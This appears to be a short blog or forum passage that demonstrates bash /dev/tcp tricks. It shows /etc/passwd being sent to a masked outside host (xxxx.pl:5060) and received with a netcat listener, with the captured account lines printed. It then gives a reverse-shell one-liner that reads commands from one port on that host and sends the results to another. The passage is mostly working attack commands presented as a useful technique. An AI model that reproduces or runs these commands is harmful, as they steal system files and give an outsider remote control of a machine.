Here we go:
zoczus@hell:~$ cat</etc/debian_version 7.1
:) Can't see the output? Send it through Internet!
[host1]
zoczus@hell:~$ cat</etc/passwd>/dev/tcp/xxxx.pl/5060
[host2]
zoczus@jano:~$ nc -l -p 5060 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh (...)
It looks all right ;) You can also create reverse shell:
sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222
So now the /bin/sh input (commands) will be taken from xxxx.pl:5060 and result - sent to xxxx.pl:2222
I hope this one was useful ;)
